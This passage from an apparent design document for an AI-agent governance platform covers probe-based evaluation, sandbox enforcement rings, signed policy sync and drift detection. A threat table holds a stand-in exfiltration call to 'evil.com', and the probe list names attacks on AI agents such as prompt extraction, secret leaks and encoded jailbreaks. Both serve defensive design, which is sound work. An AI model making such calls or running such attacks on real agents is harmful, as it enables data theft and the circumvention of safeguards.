  • recommended policy refinements (e.g., "consider denying tool X — agent
    emitted it in 12% of probes for category Y")
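The run step reduces to: execute each probe, record whether the policy blocked the agent, and score per category. Over-refusal probes invert the expectation, which is how a policy that is too tight shows up as a failure. A sketch with the sandbox abstracted as a callable; `Probe`, `run_suite`, and `expect_blocked` are hypothetical names, and real probes would replay through the tappass-agent SDK in the ephemeral sandbox rather than through a lambda.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Callable


@dataclass
class Probe:
    probe_id: str
    category: str           # e.g. "prompt_injection", "over_refusal"
    prompt: str
    expect_blocked: bool    # True for attacks; False for legitimate prompts
    severity: str = "high"  # "critical" failures gate the release


@dataclass
class Result:
    probe: Probe
    blocked: bool

    @property
    def passed(self) -> bool:
        return self.blocked == self.probe.expect_blocked


def run_suite(probes, run_probe: Callable[[str], bool]):
    """run_probe(prompt) -> True if the policy blocked the agent's action."""
    results = [Result(p, run_probe(p.prompt)) for p in probes]
    by_category = defaultdict(lambda: [0, 0])  # category -> [passed, total]
    for r in results:
        by_category[r.probe.category][0] += r.passed
        by_category[r.probe.category][1] += 1
    return results, dict(by_category)
```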

Probes are organized by category — same buckets as the OWASP LLM Top 10 mapping in §3.2:

| Probe category | Examples | What it tests |
|---|---|---|
| Prompt injection | Sycophancy, system-prompt extraction, role-confusion | gateway pipeline detections + cap-token enforcement |
| Data disclosure | PII extraction probes, secret-leak prompts | detect_pii, detect_secrets + scan_output |
| Excessive agency | "Delete everything tagged tmp", recursive tool-call patterns | loop_guard, capability scoping |
| Over-refusal | Legitimate prompts the agent should serve | catches policy that's too tight |
| Hallucination probes | Domain-specific factual checks | quality gate (out of governance scope but reported) |
| Jailbreak / obfuscation | Encoded prompts, adversarial unicode | gateway pipeline detections |
| Tool misuse | Cross-schema args, parameter manipulation | schema_acl, runtime-tool-discovery |
| Compliance-specific | EU AI Act, GDPR, PCI-DSS, HIPAA probes | per-pack assertions |

Probe suites are per-compliance-pack — so applying the EU AI Act pack also enrolls the agent in the EU AI Act probe suite. Custom probes can be added per-tenant.

Operator authors policy (§4)
▼
Operator scaffolds agent repo (§7) — agent code uses tappass-agent SDK
▼
Pre-deployment evaluation (§8) — runs against candidate policy
│ ├── pass → proceed
│ └── fail → refine policy or fix agent; re-run
▼
Operator runs `tappass sandbox-spec emit-bootstrap` (§11)
▼
Host owner runs `tappass-host init/start` (§11)
▼
Runtime governance + audit + drift detection (§9–§12)

The harness consumes the same tappass-agent SDK and the same Compiled Policy compilation as production — there is no divergence between "what we tested" and "what we deployed." Probe results land in audit; the dashboard shows "this agent passed evaluation v17 against policy_version 23."

The evaluation harness is callable from CI:

tappass eval run --agent collibra-agent --policy policies/collibra-steward.rego \
    --packs eu-ai-act,owasp-llm \
    --probe-suite v2026.05 \
    --gate fail-on=critical

Returns non-zero on critical failures; designed to gate a GitHub Action / GitLab CI pipeline before agent deployment. Output is a JUnit-style XML report plus a TapPass-native trace bundle for replay.
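The gating contract (non-zero exit on failures at or above a severity, plus a JUnit-style XML report) can be sketched with the Python standard library alone. The result tuples and the `fail_on` parameter mirror `--gate fail-on=critical` conceptually; they are assumptions, not the CLI's internals.

```python
import xml.etree.ElementTree as ET

SEVERITY_ORDER = ["low", "medium", "high", "critical"]


def junit_report(suite_name: str, results) -> str:
    """results: iterable of (probe_id, category, severity, passed)."""
    results = list(results)
    suite = ET.Element("testsuite", name=suite_name, tests=str(len(results)),
                       failures=str(sum(1 for r in results if not r[3])))
    for probe_id, category, severity, passed in results:
        case = ET.SubElement(suite, "testcase", classname=category, name=probe_id)
        if not passed:
            ET.SubElement(case, "failure", message=f"{severity} policy violation")
    return ET.tostring(suite, encoding="unicode")


def exit_code(results, fail_on: str = "critical") -> int:
    """Non-zero if any failed probe is at or above the gate severity."""
    threshold = SEVERITY_ORDER.index(fail_on)
    failing = [r for r in results if not r[3] and SEVERITY_ORDER.index(r[2]) >= threshold]
    return 1 if failing else 0
```

A CI wrapper would write the XML where the CI system collects test reports and end with `sys.exit(exit_code(results))`, which is what lets a GitHub Action or GitLab CI job fail the deployment.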

  • Is: a security and policy-conformance harness — does the agent obey the policy under adversarial conditions?
  • Isn't: a quality / hallucination evaluator beyond what's needed to test policy conformance. Hallucination quality benchmarks belong elsewhere; what this harness checks is whether hallucinations cross policy boundaries (e.g., hallucinating a denied tool name).

9. How do we enforce policy on the agent's machine?


Five enforcement positions, defense in depth: 3 rings + 2 cross-cutting layers (ADR 0001). Even if the LLM is compromised, even if the agent's runtime is patched, the kernel still blocks it; even if the kernel is bypassed, the gateway still sees every model call.

What this adds: governance over the agent's whole environment. The agent's process is the least-trusted component and is contained accordingly.

What's still missing: a way to apply policy uniformly across all five positions from one source. §10.

Three rings sit inside the agent's process — different from each other in what they enforce, the same in that they all depend on the agent's surrounding sandbox:

| Position | Type | What it isolates | Primitive | Status |
|---|---|---|---|---|
| Ring 1 — Harness | In-process · cooperative | Runtime config (allow/deny tool calls, hooks) | settings.json-style files | New |
| Ring 2 — Kernel | In-process · compulsory | Process / network / FS / credentials | OpenShell + nono + inference.local | Built (tappass/sandbox/) |
| Ring 3 — Interpreter | In-process · narrow | Code the agent writes (codemode) | OpenShell + Monty profiles | Partial |

Two cross-cutting layers sit between processes — always compulsory, always reachable, no runtime-specific cooperation needed:

| Position | What it isolates | Primitive | Status |
|---|---|---|---|
| LLM Gateway | Every prompt + completion | tappass/gateway/ (Anthropic-native, OpenAI-compat, LiteLLM 100+ providers) | Built |
| MCP Broker | Every tool call (outbound + inbound) | tappass/gateway/mcp_server.py + per-org MCP registry; schema_acl + loop_guard | Partial (broker mode is new) |

| Bypass attempt | Position that catches it |
|---|---|
| LLM hallucinates delete_pii_archive | LLM Gateway — capability token rejects emission |
| LLM emits something the gateway missed | MCP Broker — pipeline rejects on tool args |
| Agent code tries requests.post("evil.com/...") | Interpreter ring (denied import) and Kernel ring (egress denied) |
| Operator runs the agent without a harness profile | Harness ring — runtime refuses to start under enforced policies |
| Operator patches the harness | Kernel ring — egress allowlist still blocks |

Pitch: we don't trust the agent to call us correctly — we make it physically impossible to call anyone else.


10. How do we unify one policy across every enforcement position?


The Compiled Policy. One Rego policy authored in §4, merged across the cascade in §6, organized by aspect (network / filesystem / tools / interpreter / budget / compliance) per ADR 0003. Each provider per target consumes the aspects it needs and renders them as native config — defense in depth across rings + cross-cutting layers without duplication in the IR.

What this adds: the operator changes one Rego rule and every enforcement position updates.

What's still missing: a way for the Compiled Policy to actually reach the agent's machine. §11.

The Compiled Policy is content-organized by aspect, not by ring. The same aspect can be enforced at multiple positions; the providers selected by the Runtime decide where:

Compiled Policy (provisioned by `tappass sandbox-spec emit-bootstrap`):

```yaml
identity:        sandbox_id, runtime_id, policy_version, sync_url, signing
network:         allow_domains, deny_categories
filesystem:      workspace, read_only, deny_paths
tools:           allow, deny, schemas_acl
interpreter:     host_functions, memory_mb, cpu_time_ms, stack_depth
budget:          tokens_per_day, dollars_per_month, tool_calls_per_minute
compliance_tags: [SOC2:CC6.1, ISO42001:6.2.3, ...]
```

Providers per target select which aspects they consume and how to render them:

  • Harness ring (claude-code provider): tools.allow/deny + network.allow_domains → managed settings.json
  • Kernel ring (openshell provider): network.* + filesystem.* → OpenShell YAML profile
  • Kernel ring (nono provider): network.* + filesystem.* → nono run flags
  • Interpreter ring (monty provider): interpreter.* → host-function manifest + limits
  • LLM Gateway: tools.allow/deny + network.allow_domains + budget.* → capability tokens
  • MCP Broker: tools.allow/deny + compliance_tags → per-call schema ACLs
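The by-aspect selection above can be sketched in a few lines. This sketch assumes the Compiled Policy is held as a plain dict keyed by aspect, and it models each provider as a declaration of the aspect paths it consumes. The provider names come from the list above. `Provider`, `consumes`, `select_aspects`, and all values in `COMPILED_POLICY` are hypothetical. Rendering into native config (settings.json, OpenShell YAML, nono flags) is left out.

```python
import copy
from dataclasses import dataclass
from typing import Any

# Hypothetical in-memory Compiled Policy, keyed by aspect (values are illustrative only).
COMPILED_POLICY: dict[str, Any] = {
    "network": {"allow_domains": ["api.tappass.ai"], "deny_categories": ["file-sharing"]},
    "filesystem": {"workspace": "/work", "read_only": ["/etc"], "deny_paths": ["/root"]},
    "tools": {"allow": ["crm.read"], "deny": ["delete_pii_archive"], "schemas_acl": {}},
    "interpreter": {"host_functions": ["http_get"], "memory_mb": 256},
    "budget": {"tokens_per_day": 1_000_000},
    "compliance_tags": ["SOC2:CC6.1"],
}


@dataclass(frozen=True)
class Provider:
    name: str
    consumes: tuple[str, ...]  # "aspect" or "aspect.*" = whole aspect; "aspect.key" = one field


PROVIDERS = [
    Provider("claude-code", ("tools.allow", "tools.deny", "network.allow_domains")),
    Provider("openshell", ("network.*", "filesystem.*")),
    Provider("nono", ("network.*", "filesystem.*")),
    Provider("monty", ("interpreter.*",)),
    Provider("llm-gateway", ("tools.allow", "tools.deny", "network.allow_domains", "budget.*")),
    Provider("mcp-broker", ("tools.allow", "tools.deny", "compliance_tags")),
]


def select_aspects(policy: dict[str, Any], provider: Provider) -> dict[str, Any]:
    """Return a deep copy of only the parts of the policy this provider consumes."""
    selected: dict[str, Any] = {}
    for path in provider.consumes:
        aspect, _, key = path.partition(".")
        value = policy.get(aspect)
        if value is None:
            continue  # aspect absent from this policy: nothing to render
        if key in ("", "*"):
            selected[aspect] = copy.deepcopy(value)
        elif isinstance(value, dict) and key in value:
            selected.setdefault(aspect, {})[key] = copy.deepcopy(value[key])
    return selected
```

The same `network.*` slice feeds both the OpenShell and nono providers, and the rule is stored only once. That is the "by-aspect, not by-ring" property.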

Three properties: derived not authored, by-aspect not by-ring, live not static.

10.2 The chain from authoring to Compiled Policy

```
Operator picks function + categories + compliance packs   (live today)
        │
        ▼
Authoring resolver runs (~40 lines)
        │
        ▼
Pipeline config saved (effective pipeline)
        │
        ▼  merge with org floor + project floor (cascade, §6)
Operator runs tappass sandbox-spec create   (NEW)
        │
        ▼
Policy compiler reads merged pipeline + sandbox-spec → emits Compiled Policy (by aspect)
        │
        ▼
Compiled Policy saved server-side; bootstrap URL minted on demand
```
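The cascade-merge step can be illustrated under one assumed semantics, which this document does not specify: a lower level may only narrow what a higher level allows. In this sketch deny lists accumulate down the cascade, a child's allow list must be a subset of its parent's, and any contradiction is rejected at apply time (the lean recorded in the open questions). Real policies are Rego, not sets of tool names. `Level`, `merge_cascade`, and `PolicyConflict` are hypothetical.

```python
from __future__ import annotations

from dataclasses import dataclass, field


class PolicyConflict(ValueError):
    """A lower cascade level tried to widen what a higher level allows."""


@dataclass
class Level:
    name: str                        # e.g. "org", "project=eu-team", "agent"
    allow: set[str] | None = None    # None: inherit the parent's allow list unchanged
    deny: set[str] = field(default_factory=set)


def merge_cascade(levels: list[Level]) -> tuple[set[str], set[str]]:
    """Merge org -> project -> agent (in that order); return (effective_allow, effective_deny)."""
    allow: set[str] | None = None
    deny: set[str] = set()
    for level in levels:
        if level.allow is not None:
            if allow is not None and not level.allow <= allow:
                raise PolicyConflict(f"{level.name} widens allow: {sorted(level.allow - allow)}")
            if level.allow & deny:
                raise PolicyConflict(f"{level.name} allows denied tools: {sorted(level.allow & deny)}")
            allow = set(level.allow)
        deny |= level.deny  # denies only accumulate: a floor can't be lifted lower down
    # No allow list at any level means nothing is allowed (default deny).
    return (allow or set()) - deny, deny
```

For example, an org that allows `{crm.read, crm.write, gmail.send}`, a project that narrows this to `{crm.read, gmail.send}`, and an agent that denies `gmail.send` merge to an effective allow of `{crm.read}`.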

11. How does the Compiled Policy reach the agent's host?


Bootstrap URL + tappass-host init. Operator mints a single-use URL. Host owner runs tappass-host init on the target machine. Bootstrap is exchanged under the host's identity.

What this adds: a real deployment seam.

What's still missing: a way for the Compiled Policy to stay current as policy changes. §12.

Flow A — multi-sandbox laptop simulation: tappass dev seed-sandboxes --count 3 --policy customer-support; docker-compose up.

Flow B — single-machine install:

```bash
# Operator:
tappass sandbox-spec emit-bootstrap customer-support --count 1
# → https://app.tappass.ai/install/abc123

# Host owner:
pipx install tappass-host tappass-agent <agent-package>
tappass-host init my-agent --enroll-url https://app.tappass.ai/install/abc123
tappass-host start my-agent --agent <agent-package>

# Sending prompts:
tappass-host shell my-agent
$ <agent-cli> run-task <task-name>
```

Is: a single-use signed URL with a 15-minute TTL. It embeds the sandbox identity, TapPass's signing public key, and a one-shot exchange token. Isn't: a long-lived credential. The exchange happens in the first minute. Afterward, only the resulting machine identity (mTLS cert) and the Compiled Policy file (keyring.json on disk) remain, and the bootstrap URL is burned.
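Here is a server-side sketch of the single-use, 15-minute exchange. It assumes an in-memory token store. `BootstrapStore`, `mint`, and `redeem` are hypothetical names. The URL signing and the mTLS cert issuance that follow a successful redeem are omitted. The minted token stands in for the path segment of a URL such as https://app.tappass.ai/install/abc123.

```python
import secrets
import time
from dataclasses import dataclass

BOOTSTRAP_TTL_SECONDS = 15 * 60  # 15-minute TTL from the text


@dataclass
class _Pending:
    sandbox_id: str
    expires_at: float


class BootstrapStore:
    """Hypothetical server-side store of one-shot exchange tokens."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._pending: dict[str, _Pending] = {}

    def mint(self, sandbox_id: str) -> str:
        token = secrets.token_urlsafe(32)  # unguessable one-shot exchange token
        self._pending[token] = _Pending(sandbox_id, self._clock() + BOOTSTRAP_TTL_SECONDS)
        return token

    def redeem(self, token: str) -> str:
        """Burn the token and return its sandbox_id, or raise if unknown, used, or expired."""
        pending = self._pending.pop(token, None)  # pop first: the token is burned even if expired
        if pending is None:
            raise PermissionError("unknown or already-used bootstrap token")
        if self._clock() > pending.expires_at:
            raise PermissionError("bootstrap token expired")
        return pending.sandbox_id
```

Popping before checking expiry means a failed redeem still burns the token, so a leaked URL can be tried at most once.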

11.3 Agent discovery (lightweight, related)

For customers who don't yet know what agents they have, TapPass surfaces unenrolled agents in two passive ways:

  • Gateway-side detection: an LLM call hits api.tappass.ai/v1 with a token that doesn't map to any active sandbox → the dashboard logs a "potential unenrolled agent" event with source IP, user-agent, and call signature.
  • MCP-side detection: an MCP connection attempt to mcp.tappass.ai with no valid mcp_session_token → same surfacing.

Operator opens Discovered agents in the dashboard, sees a list of "things calling TapPass without enrollment," and clicks enroll this to mint a bootstrap URL targeted at the source. The detailed mechanism belongs to a separate concept; this one only commits to surfacing the signal.
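The gateway-side signal reduces to a lookup: a token that doesn't map to an active sandbox becomes a discovery event. Here is a sketch that assumes a hypothetical `active_tokens` map from token to sandbox_id. The event fields mirror the text (source IP, user-agent, call signature). Defining "call signature" as a hash of the model name plus the requested tool names is an assumption, as are the names `DiscoveryEvent` and `classify_call`.

```python
import hashlib
from dataclasses import dataclass
from typing import Union


@dataclass(frozen=True)
class DiscoveryEvent:
    """A 'potential unenrolled agent' record for the Discovered agents view."""
    source_ip: str
    user_agent: str
    call_signature: str


def call_signature(model: str, tool_names: list[str]) -> str:
    # Assumed definition: a short, stable hash of what the caller asked for,
    # so repeated calls from the same unenrolled agent group together.
    raw = model + "|" + ",".join(sorted(tool_names))
    return hashlib.sha256(raw.encode()).hexdigest()[:16]


def classify_call(token: str, active_tokens: dict[str, str], source_ip: str,
                  user_agent: str, model: str, tool_names: list[str]) -> Union[str, DiscoveryEvent]:
    """Return the sandbox_id for an enrolled caller, else a DiscoveryEvent to surface."""
    sandbox_id = active_tokens.get(token)
    if sandbox_id is not None:
        return sandbox_id
    return DiscoveryEvent(source_ip, user_agent, call_signature(model, tool_names))
```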


12. How do we keep sandboxes in sync, and detect drift?


Signed unidirectional sync push + behavioral baseline alerts. Operator changes policy; TapPass re-compiles stale Compiled Policies; signed payloads pushed; host applies; agent observes. Plus: the dashboard learns the agent's baseline behavior and alerts when production diverges.

What this adds: live propagation and a way to know when the agent's runtime behavior drifts from what the pre-deployment evaluation (§8) established.

What's still missing: the proof that the same channel can't be abused upward. §13.

```
[Operator changes policy at any cascade level]
        │
        ▼
[TapPass re-merges cascade + re-compiles every stale Compiled Policy]
        ├──▶ updates Compiled Policy rows server-side
        ├──▶ revokes old gateway_token / mcp_session_token if scope narrowed
        └──▶ pushes signed payload over sync_url
                    │
                    ▼
[tappass-host validates signature + monotonic policy_version,
 atomic-renames keyring.json file, applies provider changes]
        │
        ▼
[Agent observes via inotify; tappass-agent rebinds clients]
```
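The host's "atomic-rename" step is the standard write-to-temp-then-rename pattern. The agent, watching keyring.json, sees either the old file or the new one, never a half-written file. Here is a sketch using `os.replace`, which is atomic on POSIX when source and destination are on the same filesystem. The `apply_compiled_policy` name and the JSON layout are assumptions. The read-only mount and the inotify watch are out of scope.

```python
import json
import os
import tempfile


def apply_compiled_policy(path: str, compiled_policy: dict, policy_version: int) -> None:
    """Atomically replace the keyring file with a new policy version (host side only)."""
    directory = os.path.dirname(os.path.abspath(path))
    # Temp file in the same directory so os.replace never crosses filesystems.
    fd, tmp_path = tempfile.mkstemp(dir=directory, prefix=".keyring-", suffix=".tmp")
    try:
        with os.fdopen(fd, "w") as f:
            json.dump({"policy_version": policy_version, "compiled_policy": compiled_policy}, f)
            f.flush()
            os.fsync(f.fileno())  # make the bytes durable before they become visible
        os.chmod(tmp_path, 0o444)  # the agent only ever reads this file
        os.replace(tmp_path, path)  # atomic swap: readers see old or new, never partial
    except BaseException:
        if os.path.exists(tmp_path):
            os.unlink(tmp_path)
        raise
```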

12.2 Signed, monotonic, replay-resistant payload

```
{
  "sandbox_id": "sbx_a1b2c3",
  "policy_version": 17,
  "issued_at": "2026-05-07T10:00:00Z",
  "expires_at": "2026-05-07T10:05:00Z",
  "compiled_policy": { "network": {…}, "filesystem": {…}, "tools": {…}, "interpreter": {…}, "budget": {…}, "compliance_tags": […] },
  "signature": "ed25519:<TapPass key>:<sig>"
}
```

Host validates: signature, monotonic version, sandbox match, freshness.
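The four host-side checks can be sketched as below. The real channel signs with Ed25519. To keep this sketch stdlib-only, it substitutes HMAC-SHA256 over canonical JSON for the signature check, so treat `sign`, `verify_payload`, and the canonicalization as assumptions. The payload fields and the monotonic-version rule come from the text.

```python
import hashlib
import hmac
import json
from datetime import datetime, timezone
from typing import Optional


class PayloadRejected(Exception):
    """The host refuses to apply this sync payload."""


def _canonical(payload: dict) -> bytes:
    # Sign/verify over everything except the signature field, with stable key order.
    body = {k: v for k, v in payload.items() if k != "signature"}
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()


def sign(payload: dict, key: bytes) -> str:
    # STAND-IN for Ed25519: HMAC-SHA256 keeps the sketch dependency-free.
    return hmac.new(key, _canonical(payload), hashlib.sha256).hexdigest()


def _ts(value: str) -> datetime:
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def verify_payload(payload: dict, key: bytes, sandbox_id: str, current_version: int,
                   now: Optional[datetime] = None) -> dict:
    """Run the four host-side checks; return compiled_policy only if all pass."""
    now = now or datetime.now(timezone.utc)
    if not hmac.compare_digest(sign(payload, key), str(payload.get("signature", ""))):
        raise PayloadRejected("signature mismatch")
    if payload["sandbox_id"] != sandbox_id:
        raise PayloadRejected("payload addressed to a different sandbox")
    if payload["policy_version"] <= current_version:
        raise PayloadRejected("policy_version not newer than current (replay or rollback)")
    if not _ts(payload["issued_at"]) <= now < _ts(payload["expires_at"]):
        raise PayloadRejected("payload outside its validity window")
    return payload["compiled_policy"]
```

Rejecting `policy_version <= current` is what makes replaying an older, looser policy useless, even when its signature is genuine.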

| Token | TTL | Renewed by |
|---|---|---|
| gateway_token | 5 min | sync push |
| mcp_session_token | 5 min | sync push |
| Host mTLS cert | 1 hour | tappass-host re-auth |
| Bootstrap URL | 15 min, single-use | (burned on consumption) |

If sync stops working, the gateway and MCP capability tokens expire within five minutes and the agent can no longer act. Fail closed.
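Failing closed follows from expiry checks that never default to "allow". A token is usable only while `issued_at <= now < issued_at + ttl`, and only a successful sync push re-issues it. Here is a sketch using the TTLs from the table. `CapabilityToken`, `TTL_SECONDS`, and `renew` are hypothetical names.

```python
from dataclasses import dataclass, replace

# TTLs from the token table above, in seconds.
TTL_SECONDS = {
    "gateway_token": 5 * 60,
    "mcp_session_token": 5 * 60,
    "host_mtls_cert": 60 * 60,
}


@dataclass(frozen=True)
class CapabilityToken:
    kind: str
    issued_at: float

    def is_valid(self, now: float) -> bool:
        # Unknown kinds have no TTL entry and are never valid: fail closed.
        ttl = TTL_SECONDS.get(self.kind)
        return ttl is not None and self.issued_at <= now < self.issued_at + ttl


def renew(token: CapabilityToken, now: float) -> CapabilityToken:
    """What a successful sync push amounts to: the same token kind, freshly issued."""
    return replace(token, issued_at=now)
```

If no push arrives, nothing calls `renew`, and the agent's tokens stop validating on their own.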

12.4 Drift detection — production signals


The pre-deployment evaluation (§8) establishes the agent's baseline behavior: which tools it uses, at what frequencies, with what argument shapes, and with what session lengths. The runtime emits these as audit metrics. The dashboard learns the baseline and alerts on drift.

| Drift signal | What it catches |
|---|---|
| Tool-call distribution shift | Agent suddenly calls delete_* 10× more than baseline |
| Argument-shape drift | Args that don't match pre-deployment patterns (e.g., new schemas, new asset types) |
| Session-length anomalies | Sessions that run far longer than typical |
| Detection-rate spikes | detect_pii or detect_secrets firing more than baseline, possibly a prompt-injection campaign |
| Unenrolled-tool discovery rate | Surge in discovered rows = agent reaching for tools it hasn't before |
| Cross-sandbox correlation | Same drift signal across multiple sandboxes = upstream change (LLM provider behavior shift, new prompt template) |

Each signal raises a dashboard alert with: which baseline metric, current vs. expected, audit replay link, recommended action (re-evaluate? tighten policy? approve as new normal?).
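The first signal in the table, tool-call distribution shift, can be sketched as a per-tool ratio of call shares against the pre-deployment baseline. The default threshold of 10 mirrors the table's example. In practice it would be a per-pack default with an operator override. The `tool_call_drift` name, the share-based comparison, and the `floor` smoothing for never-seen tools are assumptions, not the drift engine's specified statistics.

```python
from collections import Counter


def tool_call_drift(baseline: Counter, current: Counter, threshold: float = 10.0,
                    floor: float = 0.5) -> dict[str, float]:
    """Return {tool: ratio} for tools whose share of calls grew by at least `threshold`.

    Shares (not raw counts) are compared, so a uniformly busier day doesn't alert.
    `floor` stands in for a zero baseline count, so brand-new tools can alert
    instead of dividing by zero.
    """
    base_total = sum(baseline.values()) or 1
    cur_total = sum(current.values()) or 1
    alerts: dict[str, float] = {}
    for tool, count in current.items():
        cur_share = count / cur_total
        base_share = max(baseline.get(tool, 0), floor) / base_total
        ratio = cur_share / base_share
        if ratio >= threshold:
            alerts[tool] = round(ratio, 1)
    return alerts
```

With a baseline where deletes are 5 of 1,000 calls, a session where they are 50 of 500 calls yields `{"collibra.delete_asset": 20.0}`. A doubled but identically shaped workload yields no alert.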

This closes the loop with §8: pre-deployment establishes the policy; runtime drift detection notices when reality diverges from what the policy was tested against.


13. How do we ensure the agent can't grant itself more?


Privilege separation + no upward channel + signed payloads + fail-closed TTLs. Four properties, foundation first. The agent is the least-trusted component; the architecture treats it as such.

What this adds: the safety property that makes "live policy" usable. Without this, the same channel that delivers updates would be a vector for the agent to influence its own Compiled Policy.

What's still missing: a way to actually operate this, with three CLIs, three audiences, and no overlap. §14.

13.1 Privilege separation between host and agent


tappass-host runs as a privileged daemon (mTLS cert, namespace/Landlock/cgroup capabilities). The agent runs unprivileged. The Compiled Policy file (keyring.json) is written by the host and mounted read-only into the agent's namespace. The agent watches it via inotify but never writes it.

There is no API on tappass-agent that asks TapPass for more capabilities. Sync is unidirectional. Enforced by:

  • Package design: tappass-agent exposes no client classes for admin endpoints.
  • Transport: kernel-ring egress allowlist blocks anything not in the Compiled Policy's URL set.
  • Authentication: the agent's tokens have no admin scope.

An attacker who fully owns the agent process cannot: modify the Compiled Policy, forge a sync payload, reach admin endpoints, replay older Compiled Policy versions, or read other sandboxes. They can: use current tokens until expiry (~5 min), try denied tools (the gateway rejects them), and trip loop_guard.
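The transport property above comes down to a default-deny egress decision. A destination is reachable only if its host appears in the Compiled Policy's network.allow_domains. Here is a sketch of that decision that assumes exact-host or dot-suffix subdomain matching. The real kernel-ring providers enforce this in OpenShell or nono rather than in Python, and their matching rules may differ. `egress_allowed` is a hypothetical name.

```python
from urllib.parse import urlsplit


def egress_allowed(url: str, allow_domains: list[str]) -> bool:
    """Default-deny: allow only hosts equal to, or subdomains of, an allowlisted domain."""
    host = (urlsplit(url).hostname or "").rstrip(".").lower()
    if not host:
        return False  # unparseable destination: deny
    for domain in allow_domains:
        domain = domain.lower().lstrip(".")
        # Dot-suffix match, so "api.tappass.ai.evil.com" does not pass for "api.tappass.ai".
        if host == domain or host.endswith("." + domain):
            return True
    return False
```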


14. How do we manage three CLIs without confusion?


Three packages, three identities, three audiences. Each persona uses exactly one. No surface does another's job.

| CLI | Package | Persona | Authn | Privilege |
|---|---|---|---|---|
| tappass | tappass-cli | Operator (CISO, project admin, agent owner) | SSO + MFA | High: defines policy at the appropriate cascade level |
| tappass-host | tappass-host | Host owner (DevOps) | Machine identity (mTLS) | Medium: applies policy locally |
| tappass-agent | tappass-agent | Agent process / dev | Scoped sandbox token | Lowest: read-only consumer |

```bash
# Operator:
tappass policy apply --level org policies/baseline.rego
tappass policy apply --pack eu-ai-act --level project=eu-team
tappass sandbox-spec emit-bootstrap eu-support-emailer --count 1
# → https://app.tappass.ai/install/abc123

# Host owner:
tappass-host init my-agent --enroll-url https://app.tappass.ai/install/abc123
tappass-host start my-agent --agent <agent-package>

# Anyone:
<agent-cli> run-task <task-name>
```

tappass — management. Authors policy at any cascade level. Applies compliance packs (tappass policy apply --pack eu-ai-act). Provisions sandbox-specs. Mints bootstraps. Tails audit. Runs evaluation (tappass eval run).

tappass-host — runtime. Consumes bootstrap. Applies the Compiled Policy across the providers in its Runtime. Launches agent. Daemonized variant of tappass exec.

tappass-agent — client SDK + thin debug CLI. Read-only. No enroll, no rotate, no request-scope.
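Here is one way "read-only consumer" can be expressed at the package level. This sketch assumes the `Keyring.load() → Client(kr)` shape mentioned in §15.1 and models it with hypothetical `Keyring` and `Client` classes; the real tappass-agent API may differ. The keyring is a frozen snapshot, and the client has no method that reaches admin endpoints, so `request_more_scopes` simply does not exist.

```python
import json
from dataclasses import dataclass
from types import MappingProxyType
from typing import Any, Mapping


@dataclass(frozen=True)
class Keyring:
    """Read-only snapshot of the Compiled Policy the host wrote to keyring.json."""
    policy_version: int
    compiled_policy: Mapping[str, Any]  # top-level view is read-only (shallow)

    @classmethod
    def from_json(cls, text: str) -> "Keyring":
        data = json.loads(text)
        return cls(data["policy_version"], MappingProxyType(data["compiled_policy"]))

    @classmethod
    def load(cls, path: str = "keyring.json") -> "Keyring":
        # The agent opens the file for reading only; the host owns all writes.
        with open(path, encoding="utf-8") as f:
            return cls.from_json(f.read())


class Client:
    """Data-plane client: it can ask 'is this allowed?', never 'grant me more'."""

    def __init__(self, keyring: Keyring):
        self._kr = keyring

    def tool_allowed(self, tool: str) -> bool:
        tools = self._kr.compiled_policy.get("tools", {})
        return tool in tools.get("allow", []) and tool not in tools.get("deny", [])

    # Deliberately no enroll / rotate / request_more_scopes methods.
```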

Server-side platform (~6–10 weeks):

| # | Piece | Size |
|---|---|---|
| 1 | Policy compiler (with cascade merge), emits Compiled Policy | L |
| 2 | Signed sync channel | M |
| 3 | MCP-forward mode in gateway/ | M |
| 4 | Per-org MCP-server registry | S |
| 5 | schema_acl, loop_guard pipeline steps | S |
| 6 | Harness-ring providers (claude-code, codex, cursor, cline, …) | S each |
| 7 | Interpreter-ring provider (monty host-function manifest) | S |
| 8 | Kernel-ring providers (OpenShell + nono Landlock + sandbox-exec) | M |

CLIs and dashboard (~4–6 weeks):

| # | Piece | Size |
|---|---|---|
| 9 | tappass management CLI | M |
| 10 | tappass-host runtime CLI + daemon | M |
| 11 | tappass-agent client SDK + thin CLI | S |
| 12 | Dashboard onboarding wizard (with compliance pack picker) | S |

Evaluation and packs (~6–10 weeks):

| # | Piece | Size |
|---|---|---|
| 13 | Pre-deployment evaluation harness + probe library | L |
| 14 | Compliance pack content (EU AI Act, OWASP LLM, GDPR, PCI-DSS, HIPAA, NIS2/DORA) | M |
| 15 | Drift detection engine (baseline + alerting) | M |

Total: ~16–26 engineering weeks across three workstreams (6–10 + 4–6 + 6–10). The architectural spine (items 1–12) is the prerequisite for items 13–15, which need something to evaluate and observe.


15. What does this look like for a real agent?


Reference implementations. Each is a separate repo depending on tappass-agent. Same architecture, different agent task.

15.1 Collibra agent — partner-facing example


tappass/collibra-agent: an agent with read-write access to a Collibra catalog. It is the partner artifact for email-collibra.md (Track 1 with Nick at Collibra) and runs end-to-end today against a mock Collibra MCP server.

```
collibra-agent/
├── README.md
├── pyproject.toml          # depends on: tappass-agent, langchain, langchain-openai
├── agent/
│   ├── main.py             # Keyring.load() → Client(kr) → ReAct loop
│   └── tasks/
├── cli/
├── mock_collibra_mcp/      # 3 schemas: customers (RW), finance (RO), pii_archive (DENY)
├── policies/               # SEED policy for the demo
├── eval/                   # SEED evaluation probes (Collibra-specific)
├── deploy/
│   └── docker-compose.yaml
└── docs/
```

Pre-stage:

```bash
tappass policy apply --level org policies/acme-baseline.rego
tappass policy apply --pack eu-ai-act --level project=collibra-eval
tappass policy apply --level project=collibra-eval policies/collibra-steward.rego
tappass eval run --agent collibra-agent --policy collibra-steward --packs eu-ai-act
# → eval report shows pass/fail per probe
tappass sandbox-spec emit-bootstrap collibra-steward --count 2
tappass-host init tenant_a --enroll-url <url1>
tappass-host init tenant_b --enroll-url <url2>
tappass-host start tenant_a --agent collibra-agent
tappass-host start tenant_b --agent collibra-agent
tappass-host daemon &
```

The moments, in order:

  1. Pre-deployment evaluation (Q8). Show tappass eval run output: 47/50 probes pass; 3 failures with replay links. Refine policy, re-run, all pass.
  2. End-to-end runtime baseline (Q2). collibra-agent run-task add-email-column → succeeds. Trace shows five contiguous spans.
  3. Schema access (Q7/Q9). run-task drop-pii-archive → denied at MCP. Audit shows reason, layer, and which cascade level introduced the rule.
  4. Rolled out across Compiled Policies (Q12). Same prompt in tenant_b → same denial.
